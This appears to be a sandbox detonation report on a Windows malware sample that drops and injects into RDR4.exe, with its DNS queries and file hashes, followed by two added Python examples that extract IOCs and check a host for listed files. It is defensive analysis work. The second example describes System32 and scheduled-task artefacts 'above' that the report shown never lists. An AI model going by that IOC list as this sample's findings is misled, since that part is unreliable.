| SHA512 | 537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392 |
Analysis: behavioral28
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
95s
Max time network
142s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RDR4.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5060 wrote to memory of 1312 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe | C:\Users\Admin\AppData\Local\Temp\RDR4.exe |
| PID 5060 wrote to memory of 1312 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe | C:\Users\Admin\AppData\Local\Temp\RDR4.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe"
C:\Users\Admin\AppData\Local\Temp\RDR4.exe
"C:\Users\Admin\AppData\Local\Temp\RDR4.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
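Every Domain in the table above is a reverse-DNS (PTR) query name, so the addresses the guest asked the resolver about are the first four labels read backwards. The following is an added example, not part of the sandbox report and not the sandbox vendor's own tooling: it parses the table rows exactly as printed on the page, decodes each `in-addr.arpa` name back to an IPv4 address, and drops the resolver's own PTR lookup (the 8.8.8.8 row carries no information about the sample's infrastructure), leaving a de-duplicated list of addresses to pivot on. The function names are this example's own. Two caveats a practitioner should keep in mind: the table records only the queries, not any connection to those addresses, and who owns them is not stated anywhere on this page.

```python
import ipaddress
import re

# Constructed sample: the rows of the report's Network table as printed on the page
# (Country | Destination | Domain | Proto). Every Domain here is a PTR query name.
SAMPLE_NETWORK_ROWS = """\
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
"""

# One pipe-delimited row with four cells; header and separator rows also match
# but are filtered out later because their Domain cell is not a PTR name.
ROW_RE = re.compile(r"^\|\s*([^|]*?)\s*\|\s*([^|]*?)\s*\|\s*([^|]*?)\s*\|\s*([^|]*?)\s*\|$")


def parse_network_rows(text):
    """Return one dict per table row: country, dest ('ip:port'), domain, proto."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            country, dest, domain, proto = m.groups()
            rows.append({"country": country, "dest": dest, "domain": domain, "proto": proto})
    return rows


def ptr_name_to_ip(name):
    """'209.205.72.20.in-addr.arpa' -> IPv4Address('20.72.205.209').

    Returns None for anything that is not a complete IPv4 PTR name: ordinary
    hostnames, ip6.arpa names, zone-level names with fewer than four labels,
    or labels that do not form a valid dotted quad."""
    name = name.strip().rstrip(".").lower()
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    labels = name[: -len(suffix)].split(".")
    if len(labels) != 4:
        return None
    try:
        return ipaddress.IPv4Address(".".join(reversed(labels)))
    except ipaddress.AddressValueError:
        return None


def pivot_addresses(text):
    """IPv4 addresses recovered from the PTR query names, minus any address that
    is itself the DNS server in the Destination column (its own PTR record says
    nothing about the sample). Sorted numerically, duplicates removed."""
    rows = parse_network_rows(text)
    resolvers = {row["dest"].rsplit(":", 1)[0] for row in rows}
    found = set()
    for row in rows:
        ip = ptr_name_to_ip(row["domain"])
        if ip is not None and str(ip) not in resolvers:
            found.add(ip)
    return sorted(found)


if __name__ == "__main__":
    for ip in pivot_addresses(SAMPLE_NETWORK_ROWS):
        print(ip, "global" if ip.is_global else "non-global")
```

Decoding the names first and de-duplicating on the address (not the string) matters because the same host can be queried under several PTR spellings; sorting on `IPv4Address` objects orders by value rather than lexically, so `20.49.x` lands before `20.109.x`.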
Files
memory/5060-0-0x00007FF98B8D3000-0x00007FF98B8D5000-memory.dmp
memory/5060-1-0x0000000000F20000-0x00000000013F2000-memory.dmp
memory/5060-3-0x00007FF98B8D0000-0x00007FF98C392000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RDR4.exe
| MD5 | e685b0c231a5f25f451e3b1628c3a55d |
| SHA1 | 6546666fb75e56302f140db8c8e9299e2ae1175b |
| SHA256 | 65d2f65bcb32cba0a2d920bec6b139bf5de4de8ad2d44db7ad7bb36035665797 |
| SHA512 | f991446d9b556bf00c25f348000a75bda67571f0de53a9947c679f483bdae8e7d28728270de530d833321a484a7050c96b57a3c10273bba87e04dd8f07cc03a4 |
memory/1312-13-0x00007FF6708A0000-0x00007FF6708CD000-memory.dmp
memory/5060-17-0x00007FF98B8D0000-0x00007FF98C392000-memory.dmp
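The Files sections of this report list each dropped artefact as a path line followed by one row per digest, with memory dumps interleaved and the same path repeated when the sandbox saw it written more than once (the two `Schedule Work` task entries above). The following is an added example, not part of the report and not the sandbox vendor's tooling: it parses that flattened layout into IOC records, rejects digests whose length does not fit the algorithm (the usual sign of a truncated copy-paste, which would otherwise yield an IOC that can never match), tags each path by where it landed, and checks a host for the listed files by SHA256. The sample text is a constructed slice of the report's own rows with the SHA512 rows left out; `parse_files_section`, `classify`, `check_host` and the injectable `read_bytes` reader are this example's own names.

```python
import hashlib
import re
from pathlib import PureWindowsPath

# Constructed sample: a slice of the report's Files section in the flattened form shown
# on the page. A path line is followed by one "| ALGO | hex |" row per digest, memory
# dump lines carry no digests, and a path repeats when it was written twice.
SAMPLE_FILES_SECTION = r"""
memory/3720-279-0x00000202012B0000-0x0000020201A1B000-memory.dmp
C:\Windows\System32\$Node32.exe
| MD5 | b850f016450d68da0ae4bb945355f70c |
| SHA1 | 521726c38af715e6ee1c76315151f0ed9518c6f4 |
| SHA256 | 8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 4ac1741ceb19f5a983079b2c5f344f5d |
| SHA1 | f1ebd93fbade2e035cd59e970787b8042cdd0f3b |
| SHA256 | 7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | a9124c4c97cba8a07a8204fac1696c8e |
| SHA1 | 1f27d80280e03762c7b16781608786f5a98ff434 |
| SHA256 | 8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21 |
C:\Users\Admin\AppData\Local\Temp\RDR4.exe
| MD5 | e685b0c231a5f25f451e3b1628c3a55d |
| SHA1 | 6546666fb75e56302f140db8c8e9299e2ae1175b |
| SHA256 | 65d2f65bcb32cba0a2d920bec6b139bf5de4de8ad2d44db7ad7bb36035665797 |
"""

HASH_ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


def parse_files_section(text):
    """Parse the flattened layout into [{"path": ..., "hashes": {algo: hex}}, ...].
    Memory dump lines are skipped; a digest of the wrong length raises ValueError."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_ROW_RE.match(line)
        if m:
            algo, digest = m.group(1).upper(), m.group(2).lower()
            if current is None:
                raise ValueError(f"digest row without a preceding path: {line}")
            if len(digest) != HEX_LEN[algo]:
                raise ValueError(f"{algo} for {current['path']}: {len(digest)} hex digits, want {HEX_LEN[algo]}")
            current["hashes"][algo] = digest
        elif line.startswith("memory/"):
            current = None
        else:
            current = {"path": line, "hashes": {}}
            records.append(current)
    return records


def classify(record):
    """'system' under C:\\Windows, 'user' under C:\\Users, else 'other'.
    A dropped PE under System32 deserves a closer look than one in %TEMP%."""
    parts = [p.lower() for p in PureWindowsPath(record["path"]).parts]
    if len(parts) > 2 and parts[1] == "windows":
        return "system"
    if len(parts) > 2 and parts[1] == "users":
        return "user"
    return "other"


def _read_file(path):
    with open(path, "rb") as f:
        return f.read()


def check_host(records, read_bytes=_read_file):
    """Look for each listed path on this host, comparing content by SHA256 only
    (MD5 and SHA1 are listed in the report but are not collision resistant).
    Per path: 'absent', 'match', 'mismatch' (present, different content), or
    'unverifiable' (no SHA256 recorded). A path listed twice matches on either digest."""
    expected = {}
    for rec in records:
        expected.setdefault(rec["path"], set()).add(rec["hashes"].get("SHA256"))
    results = {}
    for path, digests in expected.items():
        digests.discard(None)
        try:
            data = read_bytes(path)
        except OSError:
            results[path] = "absent"
            continue
        if not digests:
            results[path] = "unverifiable"
        elif hashlib.sha256(data).hexdigest() in digests:
            results[path] = "match"
        else:
            results[path] = "mismatch"
    return results


if __name__ == "__main__":
    recs = parse_files_section(SAMPLE_FILES_SECTION)
    for r in recs:
        print(classify(r), r["path"], r["hashes"].get("SHA256"))
    print(check_host(recs))
```

A `mismatch` is worth as much attention as a `match`: a file at a System32 path the report names, with content the sandbox never saw, is how a later build of the same dropper shows up. The reader is injected so the same logic can be pointed at a mounted image or an EDR file-fetch API instead of the live filesystem.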